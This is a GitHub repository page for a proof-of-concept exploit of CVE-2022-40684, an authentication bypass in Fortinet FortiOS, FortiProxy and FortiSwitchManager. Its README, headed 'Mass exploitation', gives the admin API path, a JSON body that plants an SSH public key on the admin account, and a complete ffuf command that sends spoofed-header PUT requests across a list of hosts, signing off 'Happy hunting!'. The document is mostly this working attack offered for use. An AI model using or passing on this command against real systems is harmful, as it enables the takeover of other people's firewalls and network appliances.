Skip to content

Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager

License

Notifications You must be signed in to change notification settings

kljunowsky/CVE-2022-40684-POC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2022-40684-POC

FortiProxy / FortiOS Authentication bypass

Mass exploitation

/api/v2/cmdb/system/admin/<username>

{"ssh-public-key1": "<your-id_rsa.pub>"}

ffuf -c -w hosts.txt -u FUZZ/api/v2/cmdb/system/admin/admin -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1
]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "kljunowsky"}' -mr "SSH" -r

Happy hunting!

Requirements

ffuf Thanks @joohoi!

Twitter

LinkedIn

About

Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages